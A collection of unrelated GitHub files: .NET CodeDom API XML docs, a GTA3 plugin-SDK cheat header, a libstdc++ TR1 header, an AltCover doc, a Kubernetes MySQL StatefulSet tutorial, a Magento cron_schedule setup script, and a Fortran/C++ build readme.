<param name="createType">A <see cref="T:System.CodeDom.CodeTypeReference" /> that indicates the data type of the object to create.</param>
<param name="parameters">An array of <see cref="T:System.CodeDom.CodeExpression" /> objects that indicates the parameters to use to create the object.</param>
<summary>Initializes a new instance of the <see cref="T:System.CodeDom.CodeObjectCreateExpression" /> class using the specified type and parameters.</summary>
<remarks>To be added.</remarks>
<altmember cref="T:System.CodeDom.CodeExpression" />
</Docs>
</Member>
<Member MemberName=".ctor">
<MemberSignature Language="C#" Value="public CodeObjectCreateExpression (string createType, params System.CodeDom.CodeExpression[] parameters);" />
<MemberSignature Language="ILAsm" Value=".method public hidebysig specialname rtspecialname instance void .ctor(string createType, class System.CodeDom.CodeExpression[] parameters) cil managed" />
<MemberSignature Language="DocId" Value="M:System.CodeDom.CodeObjectCreateExpression.#ctor(System.String,System.CodeDom.CodeExpression[])" />
<MemberSignature Language="VB.NET" Value="Public Sub New (createType As String, ParamArray parameters As CodeExpression())" />
<MemberSignature Language="C++ CLI" Value="public:
 CodeObjectCreateExpression(System::String ^ createType, ... cli::array <System::CodeDom::CodeExpression ^> ^ parameters);" />
<MemberSignature Language="F#" Value="new System.CodeDom.CodeObjectCreateExpression : string * System.CodeDom.CodeExpression[] -> System.CodeDom.CodeObjectCreateExpression" Usage="new System.CodeDom.CodeObjectCreateExpression (createType, parameters)" />
<MemberType>Constructor</MemberType>
<AssemblyInfo>
<AssemblyName>System</AssemblyName>
<AssemblyVersion>1.0.5000.0</AssemblyVersion>
<AssemblyVersion>2.0.0.0</AssemblyVersion>
<AssemblyVersion>4.0.0.0</AssemblyVersion>
</AssemblyInfo>
<AssemblyInfo>
<AssemblyName>System.CodeDom</AssemblyName>
<AssemblyVersion>4.0.0.0</AssemblyVersion>
<AssemblyVersion>4.0.1.0</AssemblyVersion>
<AssemblyVersion>4.0.2.0</AssemblyVersion>
<AssemblyVersion>4.0.3.0</AssemblyVersion>
<AssemblyVersion>5.0.0.0</AssemblyVersion>
</AssemblyInfo>
<Parameters>
<Parameter Name="createType" Type="System.String" />
<Parameter Name="parameters" Type="System.CodeDom.CodeExpression[]">
<Attributes>
<Attribute FrameworkAlternate="dotnet-plat-ext-2.1">
<AttributeName Language="C#">[System.ParamArray]</AttributeName>
<AttributeName Language="F#">[<System.ParamArray>]</AttributeName>
</Attribute>
</Attributes>
</Parameter>
</Parameters>
<Docs>
<param name="createType">The name of the data type of object to create.</param>
<param name="parameters">An array of <see cref="T:System.CodeDom.CodeExpression" /> objects that indicates the parameters to use to create the object.</param>
<summary>Initializes a new instance of the <see cref="T:System.CodeDom.CodeObjectCreateExpression" /> class using the specified type and parameters.</summary>
<remarks>To be added.</remarks>
</Docs>
</Member>
<Member MemberName=".ctor">
<MemberSignature Language="C#" Value="public CodeObjectCreateExpression (Type createType, params System.CodeDom.CodeExpression[] parameters);" />
<MemberSignature Language="ILAsm" Value=".method public hidebysig specialname rtspecialname instance void .ctor(class System.Type createType, class System.CodeDom.CodeExpression[] parameters) cil managed" />
<MemberSignature Language="DocId" Value="M:System.CodeDom.CodeObjectCreateExpression.#ctor(System.Type,System.CodeDom.CodeExpression[])" />
<MemberSignature Language="VB.NET" Value="Public Sub New (createType As Type, ParamArray parameters As CodeExpression())" />
<MemberSignature Language="C++ CLI" Value="public:
 CodeObjectCreateExpression(Type ^ createType, ... cli::array <System::CodeDom::CodeExpression ^> ^ parameters);" />
<MemberSignature Language="F#" Value="new System.CodeDom.CodeObjectCreateExpression : Type * System.CodeDom.CodeExpression[] -> System.CodeDom.CodeObjectCreateExpression" Usage="new System.CodeDom.CodeObjectCreateExpression (createType, parameters)" />
<MemberType>Constructor</MemberType>
<AssemblyInfo>
<AssemblyName>System</AssemblyName>
<AssemblyVersion>1.0.5000.0</AssemblyVersion>
<AssemblyVersion>2.0.0.0</AssemblyVersion>
<AssemblyVersion>4.0.0.0</AssemblyVersion>
</AssemblyInfo>
<AssemblyInfo>
<AssemblyName>System.CodeDom</AssemblyName>
<AssemblyVersion>4.0.0.0</AssemblyVersion>
<AssemblyVersion>4.0.1.0</AssemblyVersion>
<AssemblyVersion>4.0.2.0</AssemblyVersion>
<AssemblyVersion>4.0.3.0</AssemblyVersion>
<AssemblyVersion>5.0.0.0</AssemblyVersion>
</AssemblyInfo>
<Parameters>
<Parameter Name="createType" Type="System.Type" />
<Parameter Name="parameters" Type="System.CodeDom.CodeExpression[]">
<Attributes>
<Attribute FrameworkAlternate="dotnet-plat-ext-2.1">
<AttributeName Language="C#">[System.ParamArray]</AttributeName>
<AttributeName Language="F#">[<System.ParamArray>]</AttributeName>
</Attribute>
</Attributes>
</Parameter>
</Parameters>
<Docs>
<param name="createType">The data type of the object to create.</param>
<param name="parameters">An array of <see cref="T:System.CodeDom.CodeExpression" /> objects that indicates the parameters to use to create the object.</param>
<summary>Initializes a new instance of the <see cref="T:System.CodeDom.CodeObjectCreateExpression" /> class using the specified type and parameters.</summary>
<remarks>To be added.</remarks>
</Docs>
</Member>
<Member MemberName="CreateType">
<MemberSignature Language="C#" Value="public System.CodeDom.CodeTypeReference CreateType { get; set; }" />
<MemberSignature Language="ILAsm" Value=".property instance class System.CodeDom.CodeTypeReference CreateType" />
<MemberSignature Language="DocId" Value="P:System.CodeDom.CodeObjectCreateExpression.CreateType" />
<MemberSignature Language="VB.NET" Value="Public Property CreateType As CodeTypeReference" />
<MemberSignature Language="C++ CLI" Value="public:
 property System::CodeDom::CodeTypeReference ^ CreateType { System::CodeDom::CodeTypeReference ^ get(); void set(System::CodeDom::CodeTypeReference ^ value); };" />
<MemberSignature Language="F#" Value="member this.CreateType : System.CodeDom.CodeTypeReference with get, set" Usage="System.CodeDom.CodeObjectCreateExpression.CreateType" />
<MemberType>Property</MemberType>
<AssemblyInfo>
<AssemblyName>System</AssemblyName>
<AssemblyVersion>1.0.5000.0</AssemblyVersion>
<AssemblyVersion>2.0.0.0</AssemblyVersion>
<AssemblyVersion>4.0.0.0</AssemblyVersion>
</AssemblyInfo>
<AssemblyInfo>
<AssemblyName>System.CodeDom</AssemblyName>
<AssemblyVersion>4.0.0.0</AssemblyVersion>
<AssemblyVersion>4.0.1.0</AssemblyVersion>
<AssemblyVersion>4.0.2.0</AssemblyVersion>
<AssemblyVersion>4.0.3.0</AssemblyVersion>
<AssemblyVersion>5.0.0.0</AssemblyVersion>
</AssemblyInfo>
<Attributes>
<Attribute FrameworkAlternate="netframework-4.0">
<AttributeName Language="C#">[set: System.Runtime.TargetedPatchingOptOut("Performance critical to inline this type of method across NGen image boundaries")]</AttributeName>
<AttributeName Language="F#">[<set: System.Runtime.TargetedPatchingOptOut("Performance critical to inline this type of method across NGen image boundaries")>]</AttributeName>
</Attribute>
</Attributes>
<ReturnValue>
<ReturnType>System.CodeDom.CodeTypeReference</ReturnType>
</ReturnValue>
<Docs>
<summary>Gets or sets the data type of the object to create.</summary>
<value>A <see cref="T:System.CodeDom.CodeTypeReference" /> to the data type of the object to create.</value>
<remarks>To be added.</remarks>
</Docs>
</Member>
<Member MemberName="Parameters">
<MemberSignature Language="C#" Value="public System.CodeDom.CodeExpressionCollection Parameters { get; }" />
<MemberSignature Language="ILAsm" Value=".property instance class System.CodeDom.CodeExpressionCollection Parameters" />
<MemberSignature Language="DocId" Value="P:System.CodeDom.CodeObjectCreateExpression.Parameters" />
<MemberSignature Language="VB.NET" Value="Public ReadOnly Property Parameters As CodeExpressionCollection" />
<MemberSignature Language="C++ CLI" Value="public:
 property System::CodeDom::CodeExpressionCollection ^ Parameters { System::CodeDom::CodeExpressionCollection ^ get(); };" />
<MemberSignature Language="F#" Value="member this.Parameters : System.CodeDom.CodeExpressionCollection" Usage="System.CodeDom.CodeObjectCreateExpression.Parameters" />
<MemberType>Property</MemberType>
<AssemblyInfo>
<AssemblyName>System</AssemblyName>
<AssemblyVersion>1.0.5000.0</AssemblyVersion>
<AssemblyVersion>2.0.0.0</AssemblyVersion>
<AssemblyVersion>4.0.0.0</AssemblyVersion>
</AssemblyInfo>
<AssemblyInfo>
<AssemblyName>System.CodeDom</AssemblyName>
<AssemblyVersion>4.0.0.0</AssemblyVersion>
<AssemblyVersion>4.0.1.0</AssemblyVersion>
<AssemblyVersion>4.0.2.0</AssemblyVersion>
<AssemblyVersion>4.0.3.0</AssemblyVersion>
<AssemblyVersion>5.0.0.0</AssemblyVersion>
</AssemblyInfo>
<Attributes>
<Attribute FrameworkAlternate="netframework-4.0">
<AttributeName Language="C#">[get: System.Runtime.TargetedPatchingOptOut("Performance critical to inline this type of method across NGen image boundaries")]</AttributeName>
<AttributeName Language="F#">[<get: System.Runtime.TargetedPatchingOptOut("Performance critical to inline this type of method across NGen image boundaries")>]</AttributeName>
</Attribute>
</Attributes>
<ReturnValue>
<ReturnType>System.CodeDom.CodeExpressionCollection</ReturnType>
</ReturnValue>
<Docs>
<summary>Gets or sets the parameters to use in creating the object.</summary>
<value>A <see cref="T:System.CodeDom.CodeExpressionCollection" /> that indicates the parameters to use when creating the object.</value>
<remarks>To be added.</remarks>
<altmember cref="T:System.CodeDom.CodeExpressionCollection" />
</Docs>
</Member>
</Members>
</Type>
| {
"pile_set_name": "Github"
} |
/*
    Plugin-SDK (Grand Theft Auto 3) header file
    Authors: GTA Community. See more here
    https://github.com/DK22Pac/plugin-sdk
    Do not delete this comment block. Respect others' work!
*/
#pragma once
#include "PluginBase.h"
// Free-function wrappers for the in-game cheat effects (CCheat).
// The SUPPORTED_10EN_11EN_STEAM macro (from PluginBase.h) tags each
// function as available for the 1.0 EN, 1.1 EN, and Steam executables.
SUPPORTED_10EN_11EN_STEAM void WeaponCheat();
SUPPORTED_10EN_11EN_STEAM void HealthCheat();
SUPPORTED_10EN_11EN_STEAM void TankCheat();
SUPPORTED_10EN_11EN_STEAM void BlowUpCarsCheat();
SUPPORTED_10EN_11EN_STEAM void ChangePlayerCheat();
SUPPORTED_10EN_11EN_STEAM void MayhemCheat();
SUPPORTED_10EN_11EN_STEAM void EverybodyAttacksPlayerCheat();
SUPPORTED_10EN_11EN_STEAM void WeaponsForAllCheat();
SUPPORTED_10EN_11EN_STEAM void FastTimeCheat();
SUPPORTED_10EN_11EN_STEAM void SlowTimeCheat();
SUPPORTED_10EN_11EN_STEAM void MoneyCheat();
SUPPORTED_10EN_11EN_STEAM void ArmourCheat();
SUPPORTED_10EN_11EN_STEAM void WantedLevelUpCheat();
SUPPORTED_10EN_11EN_STEAM void WantedLevelDownCheat();
// Weather overrides
SUPPORTED_10EN_11EN_STEAM void SunnyWeatherCheat();
SUPPORTED_10EN_11EN_STEAM void CloudyWeatherCheat();
SUPPORTED_10EN_11EN_STEAM void RainyWeatherCheat();
SUPPORTED_10EN_11EN_STEAM void FoggyWeatherCheat();
SUPPORTED_10EN_11EN_STEAM void FastWeatherCheat();
// Vehicle / player oddities
SUPPORTED_10EN_11EN_STEAM void OnlyRenderWheelsCheat();
SUPPORTED_10EN_11EN_STEAM void ChittyChittyBangBangCheat();
SUPPORTED_10EN_11EN_STEAM void StrongGripCheat();
SUPPORTED_10EN_11EN_STEAM void NastyLimbsCheat();
#include "meta/meta.CCheat.h"
| {
"pile_set_name": "Github"
} |
// TR1 stdarg.h -*- C++ -*-
// Copyright (C) 2006-2013 Free Software Foundation, Inc.
//
// This file is part of the GNU ISO C++ Library. This library is free
// software; you can redistribute it and/or modify it under the
// terms of the GNU General Public License as published by the
// Free Software Foundation; either version 3, or (at your option)
// any later version.
// This library is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
// GNU General Public License for more details.
// Under Section 7 of GPL version 3, you are granted additional
// permissions described in the GCC Runtime Library Exception, version
// 3.1, as published by the Free Software Foundation.
// You should have received a copy of the GNU General Public License and
// a copy of the GCC Runtime Library Exception along with this program;
// see the files COPYING3 and COPYING.RUNTIME respectively. If not, see
// <http://www.gnu.org/licenses/>.
/** @file tr1/stdarg.h
* This is a TR1 C++ Library header.
*/
#ifndef _TR1_STDARG_H
#define _TR1_STDARG_H 1
/* Thin redirect: all content comes from the C++ wrapper <tr1/cstdarg>,
   which corresponds to the C library's <stdarg.h>. */
#include <tr1/cstdarg>
#endif
| {
"pile_set_name": "Github"
} |
# Primitive.PrepareOptions.LineCover property
Corresponds to command line option `--linecover`
```csharp
public bool LineCover { get; }
```
## See Also
* class [PrepareOptions](../Primitive.PrepareOptions-apidoc)
* namespace [AltCover](../../AltCover-apidoc)
<!-- DO NOT EDIT: generated by xmldocmd for AltCover.exe -->
| {
"pile_set_name": "Github"
} |
= Kubernetes Stateful Containers using StatefulSets and Persistent Volumes
:toc:
:icons:
:linkcss:
:imagesdir: ../../resources/images
In this section, we will review how to launch and manage applications using https://kubernetes.io/docs/concepts/abstractions/controllers/statefulsets/[StatefulSets] and https://kubernetes.io/docs/concepts/storage/persistent-volumes/[Persistent Volumes].
We will review how to deploy MySQL database using StatefulSets and EBS volumes. The example is a MySQL single-master topology with multiple slaves running asynchronous replication.
The example consists of ConfigMap, two MySQL services and a StatefulSet. We will deploy MySQL database,
send some traffic to test connection status, go through few failure modes and review resiliency that
is built into the StatefulSet. Lastly, we'll demonstrate how to use scale options with StatefulSet.
== Prerequisites
In order to perform exercises in this chapter, you’ll need to deploy configurations to a Kubernetes cluster. To create an EKS-based Kubernetes cluster, use the link:../../01-path-basics/102-your-first-cluster#create-a-kubernetes-cluster-with-eks[AWS CLI] (recommended). If you wish to create a Kubernetes cluster without EKS, you can instead use link:../../01-path-basics/102-your-first-cluster#alternative-create-a-kubernetes-cluster-with-kops[kops].
All configuration files for this chapter are in the `statefulsets` directory. Make sure you change to that directory before giving any commands in this chapter.
== Create ConfigMap
Using ConfigMap, you can independently control MySQL configuration. The ConfigMap looks like as shown:
```
apiVersion: v1
kind: ConfigMap
metadata:
name: mysql-config
labels:
app: mysql
data:
master.cnf: |
# Apply this config only on the master.
[mysqld]
log-bin
slave.cnf: |
# Apply this config only on slaves.
[mysqld]
super-read-only
```
In this case, we are using master to serve replication logs to slave and slaves are read-only. Create the ConfigMap using the command shown:
$ kubectl create -f templates/mysql-configmap.yaml
configmap "mysql-config" created
== Create Services
Create two headless services using the following configuration:
```
# Headless service for stable DNS entries of StatefulSet members.
apiVersion: v1
kind: Service
metadata:
name: mysql
labels:
app: mysql
spec:
ports:
- name: mysql
port: 3306
clusterIP: None
selector:
app: mysql
---
# Client service for connecting to any MySQL instance for reads.
# For writes, you must instead connect to the master: mysql-0.mysql.
apiVersion: v1
kind: Service
metadata:
name: mysql-read
labels:
app: mysql
spec:
ports:
- name: mysql
port: 3306
selector:
app: mysql
```
The `mysql` service is used for DNS resolution so that when pods are placed by StatefulSet controller, pods can be resolved using `<pod-name>.mysql`. `mysql-read` is a client service that does load balancing for all slaves.
$ kubectl create -f templates/mysql-services.yaml
service "mysql" created
service "mysql-read" created
Only read queries can use the load-balanced `mysql-read` service. Because there is only one MySQL master, clients should connect directly to the MySQL master Pod, identified by `mysql-0.mysql`, to execute writes.
== Create StatefulSet
Finally, we create StatefulSet using the configuration in `templates/mysql-statefulset.yaml` using the command shown:
$ kubectl create -f templates/mysql-statefulset.yaml
statefulset "mysql" created
$ kubectl get -w statefulset
NAME DESIRED CURRENT AGE
mysql 3 1 8s
mysql 3 2 59s
mysql 3 3 2m
mysql 3 3 3m
In a different terminal window, you can watch the progress of pod creation using the following command:
$ kubectl get pods -l app=mysql --watch
NAME READY STATUS RESTARTS AGE
mysql-0 0/2 Init:0/2 0 30s
mysql-0 0/2 Init:1/2 0 35s
mysql-0 0/2 PodInitializing 0 47s
mysql-0 1/2 Running 0 48s
mysql-0 2/2 Running 0 59s
mysql-1 0/2 Pending 0 0s
mysql-1 0/2 Pending 0 0s
mysql-1 0/2 Pending 0 0s
mysql-1 0/2 Init:0/2 0 0s
mysql-1 0/2 Init:1/2 0 35s
mysql-1 0/2 Init:1/2 0 45s
mysql-1 0/2 PodInitializing 0 54s
mysql-1 1/2 Running 0 55s
mysql-1 2/2 Running 0 1m
mysql-2 0/2 Pending 0 <invalid>
mysql-2 0/2 Pending 0 <invalid>
mysql-2 0/2 Pending 0 0s
mysql-2 0/2 Init:0/2 0 0s
mysql-2 0/2 Init:1/2 0 32s
mysql-2 0/2 Init:1/2 0 43s
mysql-2 0/2 PodInitializing 0 50s
mysql-2 1/2 Running 0 52s
mysql-2 2/2 Running 0 56s
Press `Ctrl`+`C` to stop watching. If you notice, the pods are initialized in an orderly fashion in their
startup process. The reason being StatefulSet controller assigns a unique, stable name (`mysql-0`,
`mysql-1`, `mysql-2`) with `mysql-0` being the master and others being slaves. The configuration uses https://www.percona.com/software/mysql-database/percona-xtrabackup[Percona
Xtrabackup] (open-source tool) to clone source MySQL server to its slaves.
== Test MySQL setup
You can use `mysql-client` to send some data to the master (`mysql-0.mysql`)
```
kubectl run mysql-client --image=mysql:5.7 -i --rm --restart=Never --\
mysql -h mysql-0.mysql <<EOF
CREATE DATABASE test;
CREATE TABLE test.messages (message VARCHAR(250));
INSERT INTO test.messages VALUES ('hello, from mysql-client');
EOF
```
You can run the following to test if slaves (`mysql-read`) received the data
```
$ kubectl run mysql-client --image=mysql:5.7 -it --rm --restart=Never --\
mysql -h mysql-read -e "SELECT * FROM test.messages"
```
This should display an output like this:
```
+--------------------------+
| message |
+--------------------------+
| hello, from mysql-client |
+--------------------------+
```
To test load balancing across slaves, you can run the following command:
kubectl run mysql-client-loop --image=mysql:5.7 -i -t --rm --restart=Never --\
bash -ic "while sleep 1; do mysql -h mysql-read -e 'SELECT @@server_id,NOW()'; done"
Each MySQL instance is assigned a unique identifier, and it can be retrieved using `@@server_id`. This command prints the server id serving the request and the timestamp in an infinite loop.
This command will show the output:
+-------------+---------------------+
| @@server_id | NOW() |
+-------------+---------------------+
| 100 | 2017-10-24 03:01:11 |
+-------------+---------------------+
+-------------+---------------------+
| @@server_id | NOW() |
+-------------+---------------------+
| 100 | 2017-10-24 03:01:12 |
+-------------+---------------------+
+-------------+---------------------+
| @@server_id | NOW() |
+-------------+---------------------+
| 102 | 2017-10-24 03:01:13 |
+-------------+---------------------+
+-------------+---------------------+
| @@server_id | NOW() |
+-------------+---------------------+
| 101 | 2017-10-24 03:01:14 |
+-------------+---------------------+
You can leave this open in a separate window while you run failure modes in the next section.
Alternatively, you can use `Ctrl`+`C` to terminate the loop.
== Testing failure modes
We will see how StatefulSet behave in different failure modes. The following modes will be tested:
. Unhealthy container
. Failed pod
. Failed node
=== Unhealthy container
MySQL container uses readiness probe by running `mysql -h 127.0.0.1 -e 'SELECT 1'` on the server to make sure MySQL server is still active.
Run this command to simulate MySQL as being unresponsive:
kubectl exec mysql-2 -c mysql -- mv /usr/bin/mysql /usr/bin/mysql.off
This command renames the `/usr/bin/mysql` command so that readiness probe cannot find it. After a few seconds, during the next health check, the Pod should report one of its containers is not healthy. This can be verified using the command:
kubectl get pod mysql-2
NAME READY STATUS RESTARTS AGE
mysql-2 1/2 Running 0 12m
`mysql-read` load balancer detects failures like this and takes action by not sending traffic to failed containers. You can check this if you have the loop running in separate window. The loop shows the following output:
```
+-------------+---------------------+
| @@server_id | NOW() |
+-------------+---------------------+
| 101 | 2017-10-24 03:17:09 |
+-------------+---------------------+
+-------------+---------------------+
| @@server_id | NOW() |
+-------------+---------------------+
| 101 | 2017-10-24 03:17:10 |
+-------------+---------------------+
+-------------+---------------------+
| @@server_id | NOW() |
+-------------+---------------------+
| 100 | 2017-10-24 03:17:11 |
+-------------+---------------------+
+-------------+---------------------+
| @@server_id | NOW() |
+-------------+---------------------+
| 100 | 2017-10-24 03:17:12 |
+-------------+---------------------+
```
Revert back to its initial state
kubectl exec mysql-2 -c mysql -- mv /usr/bin/mysql.off /usr/bin/mysql
Check the status again to see that both the pods are running and healthy:
$ kubectl get pod -w mysql-2
NAME READY STATUS RESTARTS AGE
mysql-2 2/2 Running 0 5h
And the loop is now also showing all three servers.
=== Failed pod
To simulate a failed pod, you can delete a pod as shown:
kubectl delete pod mysql-2
pod "mysql-2" deleted
StatefulSet controller recognizes failed pods and creates a new one with same name and link to the same
PersistentVolumeClaim.
$ kubectl get pod -w mysql-2
NAME READY STATUS RESTARTS AGE
mysql-2 0/2 Init:0/2 0 28s
mysql-2 0/2 Init:1/2 0 31s
mysql-2 0/2 PodInitializing 0 32s
mysql-2 1/2 Running 0 33s
mysql-2 2/2 Running 0 37s
=== Failed node
Kubernetes allows a node to be marked unschedulable using the `kubectl drain` command. This prevents any new pods from being scheduled on this node. If the API server supports eviction, then it will evict the pods. Otherwise, it will delete all the pods. The evict and delete happens for all the pods except mirror pods (which cannot be deleted through API server). Read more about drain at https://kubernetes.io/docs/tasks/administer-cluster/safely-drain-node/.
You can simulate node downtime by draining the node. In order to determine which node to drain, run
this command
$ kubectl get pod mysql-2 -o wide
NAME READY STATUS RESTARTS AGE IP NODE
mysql-2 2/2 Running 0 11m 100.96.6.12 ip-172-20-64-152.ec2.internal
Drain the node using the command:
$ kubectl drain ip-172-20-64-152.ec2.internal --force --delete-local-data --ignore-daemonsets
node "ip-172-20-64-152.ec2.internal" cordoned
WARNING: Deleting pods with local storage: mysql-2; Deleting pods not managed by ReplicationController, ReplicaSet, Job, DaemonSet or StatefulSet: kube-proxy-ip-172-20-64-152.ec2.internal
pod "kube-dns-479524115-76s6j" evicted
pod "mysql-2" evicted
node "ip-172-20-64-152.ec2.internal" drained
You can look at the list of nodes:
$ kubectl get nodes
NAME STATUS ROLES AGE VERSION
ip-172-20-107-81.ec2.internal Ready node 10h v1.7.4
ip-172-20-122-243.ec2.internal Ready master 10h v1.7.4
ip-172-20-125-181.ec2.internal Ready node 10h v1.7.4
ip-172-20-37-239.ec2.internal Ready master 10h v1.7.4
ip-172-20-52-200.ec2.internal Ready node 10h v1.7.4
ip-172-20-57-5.ec2.internal Ready node 10h v1.7.4
ip-172-20-64-152.ec2.internal Ready,SchedulingDisabled node 10h v1.7.4
ip-172-20-76-117.ec2.internal Ready master 10h v1.7.4
Notice how scheduling is disabled on one node.
Now you can watch Pod reschedules
kubectl get pod mysql-2 -o wide --watch
The output always stay at:
NAME READY STATUS RESTARTS AGE IP NODE
mysql-2 0/2 Pending 0 33s <none> <none>
This could be a bug in StatefulSet as the pod was failing to reschedule. The reason was that there were no other nodes running in the AZ where the original node failed. The EBS volume was failing to attach to other nodes because of the cross-AZ restriction.
To mitigate this issue, manually scale the nodes to 6 which resulted in an additional node being available in that AZ.
Your scenario could be different and may not need this step.
Edit number of nodes to `6` if you run into `Pending` issue:
kops edit ig nodes
Change the specification to:
spec:
image: kope.io/k8s-1.7-debian-jessie-amd64-hvm-ebs-2017-07-28
machineType: t2.medium
maxSize: 6
minSize: 6
role: Node
subnets:
- us-east-1a
- us-east-1b
- us-east-1c
Review and commit changes:
kops update cluster --yes
It takes a few minutes for a new node to be provisioned. This can be verified using the command shown:
$ kubectl get nodes
NAME STATUS ROLES AGE VERSION
ip-172-20-107-81.ec2.internal Ready node 10h v1.7.4
ip-172-20-122-243.ec2.internal Ready master 10h v1.7.4
ip-172-20-125-181.ec2.internal Ready node 10h v1.7.4
ip-172-20-37-239.ec2.internal Ready master 10h v1.7.4
ip-172-20-52-200.ec2.internal Ready node 10h v1.7.4
ip-172-20-57-5.ec2.internal Ready node 10h v1.7.4
ip-172-20-64-152.ec2.internal Ready,SchedulingDisabled node 10h v1.7.4
ip-172-20-73-181.ec2.internal Ready node 1m v1.7.4
ip-172-20-76-117.ec2.internal Ready master 10h v1.7.4
Now you can watch the status of the pod:
$ kubectl get pod mysql-2 -o wide
NAME READY STATUS RESTARTS AGE IP NODE
mysql-2 2/2 Running 0 11m 100.96.8.2 ip-172-20-73-181.ec2.internal
Let's put the previous node back into normal state:
$ kubectl uncordon ip-172-20-64-152.ec2.internal
node "ip-172-20-64-152.ec2.internal" uncordoned
The list of nodes is now shown as:
$ kubectl get nodes
NAME STATUS ROLES AGE VERSION
ip-172-20-107-81.ec2.internal Ready node 10h v1.7.4
ip-172-20-122-243.ec2.internal Ready master 10h v1.7.4
ip-172-20-125-181.ec2.internal Ready node 10h v1.7.4
ip-172-20-37-239.ec2.internal Ready master 10h v1.7.4
ip-172-20-52-200.ec2.internal Ready node 10h v1.7.4
ip-172-20-57-5.ec2.internal Ready node 10h v1.7.4
ip-172-20-64-152.ec2.internal Ready node 10h v1.7.4
ip-172-20-73-181.ec2.internal Ready node 3m v1.7.4
ip-172-20-76-117.ec2.internal Ready master 10h v1.7.4
== Scaling slaves
More slaves can be added to the MySQL cluster to increase the read query capacity. This can be done using the command shown:
$ kubectl scale statefulset mysql --replicas=5
statefulset "mysql" scaled
Of course, you can watch the progress of scaling
kubectl get pods -l app=mysql -w
It shows the output:
$ kubectl get pods -l app=mysql -w
NAME READY STATUS RESTARTS AGE
mysql-0 2/2 Running 0 6h
mysql-1 2/2 Running 0 6h
mysql-2 2/2 Running 0 16m
mysql-3 0/2 Init:0/2 0 1s
mysql-3 0/2 Init:1/2 0 18s
mysql-3 0/2 Init:1/2 0 28s
mysql-3 0/2 PodInitializing 0 36s
mysql-3 1/2 Running 0 37s
mysql-3 2/2 Running 0 43s
mysql-4 0/2 Pending 0 <invalid>
mysql-4 0/2 Pending 0 <invalid>
mysql-4 0/2 Pending 0 0s
mysql-4 0/2 Init:0/2 0 0s
mysql-4 0/2 Init:1/2 0 31s
mysql-4 0/2 Init:1/2 0 41s
mysql-4 0/2 PodInitializing 0 52s
mysql-4 1/2 Running 0 53s
mysql-4 2/2 Running 0 58s
If the loop is still running, then it will print an output as shown:
+-------------+---------------------+
| 101 | 2017-10-24 03:53:53 |
+-------------+---------------------+
+-------------+---------------------+
| @@server_id | NOW() |
+-------------+---------------------+
| 100 | 2017-10-24 03:53:54 |
+-------------+---------------------+
+-------------+---------------------+
| @@server_id | NOW() |
+-------------+---------------------+
| 102 | 2017-10-24 03:53:55 |
+-------------+---------------------+
+-------------+---------------------+
| @@server_id | NOW() |
+-------------+---------------------+
| 103 | 2017-10-24 03:53:57 |
+-------------+---------------------+
+-------------+---------------------+
| @@server_id | NOW() |
+-------------+---------------------+
| 103 | 2017-10-24 03:53:58 |
+-------------+---------------------+
+-------------+---------------------+
| @@server_id | NOW() |
+-------------+---------------------+
| 104 | 2017-10-24 03:53:59 |
+-------------+---------------------+
You can also verify if the slaves have the same data set:
kubectl run mysql-client --image=mysql:5.7 -i -t --rm --restart=Never --\
mysql -h mysql-3.mysql -e "SELECT * FROM test.messages"
It still shows the same result:
+--------------------------+
| message |
+--------------------------+
| hello, from mysql-client |
+--------------------------+
You can scale down by using the command shown:
kubectl scale statefulset mysql --replicas=3
statefulset "mysql" scaled
Note that scaling in doesn't delete the data or PVCs attached to the pods. You have to delete
them manually:
kubectl delete pvc data-mysql-3
kubectl delete pvc data-mysql-4
It shows the output:
persistentvolumeclaim "data-mysql-3" deleted
persistentvolumeclaim "data-mysql-4" deleted
== Cleaning up
First delete the StatefulSet. This also terminates the pods:
$ kubectl delete statefulset mysql
statefulset "mysql" deleted
Verify there are no more pods running:
kubectl get pods -l app=mysql
It shows the output:
No resources found.
Delete ConfigMap, Service, PVC using the command:
$ kubectl delete configmap,service,pvc -l app=mysql
configmap "mysql-config" deleted
service "mysql" deleted
service "mysql-read" deleted
persistentvolumeclaim "data-mysql-0" deleted
persistentvolumeclaim "data-mysql-1" deleted
persistentvolumeclaim "data-mysql-2" deleted
You are now ready to continue on with the workshop!
:frame: none
:grid: none
:valign: top
[align="center", cols="1", grid="none", frame="none"]
|=====
|image:button-continue-developer.png[link=../../03-path-application-development/308-cicd-workflows/]
|link:../../developer-path.adoc[Go to Developer Index]
|=====
| {
"pile_set_name": "Github"
} |
<?php
// Magento setup script: (re)creates the extra scheduling/bookkeeping
// columns on the cron_schedule table.
$installer = $this;
/* @var $installer Mage_Core_Model_Resource_Setup */
$installer->startSetup();

$tableName = $installer->getTable('cron_schedule');

try {
    // Drop any pre-existing 'parameters' column so it can be re-created
    // below with the expected TEXT definition.
    // NOTE(review): data in an existing column is lost here — presumably
    // acceptable for this migration; confirm before reusing the pattern.
    $installer->getConnection()->dropColumn($tableName, 'parameters');
} catch (Exception $e) {
    // ignored intentionally
}

// Serialized job parameters.
$installer->getConnection()->addColumn(
    $tableName,
    'parameters',
    "TEXT NULL COMMENT 'Serialized Parameters'"
);

// Estimated time of arrival for the job (see column comment).
$installer->getConnection()->addColumn(
    $tableName,
    'eta',
    "timestamp NULL DEFAULT NULL COMMENT 'Estimated Time of Arrival'"
);

// Host running the job.
$installer->getConnection()->addColumn(
    $tableName,
    'host',
    "varchar(255) NULL COMMENT 'Host running this job'"
);

// Process id of the job.
$installer->getConnection()->addColumn(
    $tableName,
    'pid',
    "varchar(255) NULL COMMENT 'Process id of this job'"
);

// Free-form progress message for the job.
$installer->getConnection()->addColumn(
    $tableName,
    'progress_message',
    "TEXT NULL COMMENT 'Progress message'"
);

$installer->endSetup();
| {
"pile_set_name": "Github"
} |
Build and Run
=============
To build this very simple example, do something like this::
gfortran -c fortmyfunc.f90
gcc -c -std=c++11 myfunc.cpp
gfortran fortmyfunc.o myfunc.o -o main -lstdc++
main
The ``-lstdc++`` flag is required to link in the C++ standard libraries.
Running ``main`` should yield something like::
1
42.000000000000000
0.0000000000000000
1.0000000000000000
2.0000000000000000
3.0000000000000000
4.0000000000000000
5.0000000000000000
6.0000000000000000
7.0000000000000000
8.0000000000000000
9.0000000000000000
10.000000000000000
11.000000000000000
12.000000000000000
13.000000000000000
14.000000000000000
15.000000000000000
16.000000000000000
17.000000000000000
18.000000000000000
19.000000000000000
Compiling on Windows
====================
